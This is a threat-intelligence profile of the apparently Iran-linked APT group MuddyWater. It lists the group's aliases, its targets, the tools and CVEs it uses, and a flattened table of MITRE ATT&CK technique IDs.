MuddyWater is an APT group assessed to be affiliated to the Iranian Government, that targets victims in the Middle East with in-memory vectors leveraging on PowerShell, in a family of attacks now identified as “Living off the land”, as they don’t require the creation of new binaries on the victim’s machine, thus maintaining a low detection profile and a low forensic footprint. The operators behind MuddyWater are likely espionage motivated. Despite the strong preponderance of victims from Pakistan, the most active targets appear to be in Saudi Arabia, the UAE, and Iraq.
Alias:
MERCURY, Seedworm, Static Kitten, TEMP.Zagros, Earth Vetala
Motivation:
Information theft and espionage
Target Technologies:
Office Suites Software, Operating System, Web Application
Targeted Industries:
Aerospace, Aerospace & Defense, Agriculture, Capital Goods, Consumer Services, Defense, Energy, Energy Equipment & Services, Finance, Food, Gaming, High Tech IT Service Providers, Individuals, Media, Media & Entertainment, Military, NGO, Natural Resources, Oil and Gas, Politics, Telecommunication, Telecommunication Services, Transportation, Construction, Cryptocurrency, Education, Engineering, Government, Healthcare, and Metals
Targeted Countries
Israel, Saudi Arabia, the United Arab Emirates, Iraq, Jordan, Lebanon, Qatar, Albania, Turkey, Austria, Ukraine, Russia, India, Azerbaijan, Pakistan, the United States of America, and Mali
Tools Used:
Secure Sockets Funneling , Remadmin , Chisel , Quarks pwDump , PowGoop (Downloader.Covic) , Mimikatz , POWERSTATS , PowGoop , Thanos ransomware
CVE-2017-0199 | CVE-2020-1472 |
CVE-2017-11882 | CVE-2017-0144 |
CVE-2017-17215 | CVE-2014-8361 |
Reconnaissance | Persistence | Discovery |
T1589.002 | T1053.005 | T1087.002 |
T1137.001 | T1518.001 | |
Resource Development | T1574.002 | T1049 |
T1583.006 | T1547.001 | T1016 |
T1588.002 | T1057 | |
Privilege Escalation | T1033 | |
Initial Access | T1548.002 | T1518 |
T1566.001 | T1053.005 | T1082 |
T1566.002 | T1574.002 | T1083 |
T1190 | T1547.001 | |
Lateral Movement | ||
Execution | Defense Evasion | T1210 |
T1203 | T1548.002 | |
T1047 | T1218.011 | Collection |
T1059.003 | T1027 | T1113 |
T1053.005 | T1562.001 | T1074.001 |
T1204.001 | T1036.005 | T1560.001 |
T1059.001 | T1027.003 | |
T1204.002 | T1027.004 | Command and Control |
T1059.006 | T1140 | T1573.001 |
T1059.007 | T1218.003 | T1104 |
T1559.002 | T1574.002 | T1071.001 |
T1559.001 | T1218.005 | T1102.002 |
T1059.005 | T1132.001 | |
Credential Access | T1219 | |
T1555 | T1090.002 | |
T1555.003 | T1105 | |
T1552.001 | ||
T1003.005 | Exfiltration | |
T1003.004 | T1041 | |
T1003.001 |